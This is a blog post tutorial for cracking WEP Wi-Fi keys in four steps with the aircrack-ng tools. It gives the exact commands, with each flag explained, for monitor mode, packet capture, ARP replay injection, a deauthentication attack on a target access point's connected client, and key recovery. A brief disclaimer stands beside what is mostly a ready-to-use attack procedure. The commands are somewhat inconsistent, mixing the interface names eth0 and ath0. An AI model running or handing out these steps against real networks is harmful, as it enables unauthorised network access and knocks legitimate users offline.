Cracking WEP in 4 steps

Desclaimer: This is just to show that how insecure WEP is. This guide is not meant to teach how to crack. Use on own discretion. I am not to be held responsible for any harm done.

Prerequisites:

BackTrack 3

Supported wireless card

10 minutes of your time.

 

Step 1: Set the wireless card into monitor mode

>airmon-ng start eth0

“airmon-ng” is the program itself.

“eth0” The name of my wireless card.

 

Step2: Check for available networks and the one you wish to find the key.

Command = “airodump-ng -w capture -c 6 ath0”

“airodump-ng” is the program itself.

“-w capture” Gets it to write the sniffed packets to a file called “capture.cap”.

“-c 6” Makes the program ONLY sniff on channel 6.

“eth0” The name of my wireless card.

 

Step3: Generate some traffic on your own to save time.

Command = “aireplay-ng –arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA eth0”

“aireplay-ng” Name of the program.

“–arpreplay” Is the function of aireplay you are trying to perform, in this case it’s a replay of a ARP request, which will contain IV data.

“-b 00:11:22:33:44:55” MAC address of the target AP.

“-h 66:77:88:99:00:AA” MAC address of the target machine connected to that AP.

“eth0” Name of my wireless card.

Command = “aireplay-ng -e Linksys -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA –deauth 10 ath0”

“aireplay-ng” is the program itself

“-e Linksys” is the name of the SSID of the target AP.

“-a 00:11:22:33:44:55” is the MAC address of the target AP.

“-c 66:77:88:99:00:AA” is the MAC address of the target machine connected to that AP (you should be able to find any machines connected to the AP from looking at the info in AiroDump).

“–deauth 10” The type of attack we’re performing, in this case it’s the DEAUTH attack repeated 10 times.

“eth0” The name of my wireless card.

optional step 

 

Step4: Do the cracking of the accumulated packets.

Command= “aircrack-ng capture-01.cap

“aircrack-ng” is the program itself.

Capture is the name of the file we wrote packets into.  -01 is added automatically to the filename and .cap is the extension

Once you hit enter , you would be presented with an index. Select the index number of your AP and hit enter. Wait for the decryption to complete. If enough packets have been captured the key would be decrypted and shown at the end.

 

Advertisements

Author: MtaraM

Solution designer with Firstsource solutions. An MBA grad in Networks and IT Infrastructure. Technology enthusiast, blogger, webdesigner, Network security aspirant and in love with electronics and gadgets a Household Hacker and Audiophile who loves to share thoughts about almost anything @Mtaram on Twitter

4 thoughts on “Cracking WEP in 4 steps”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s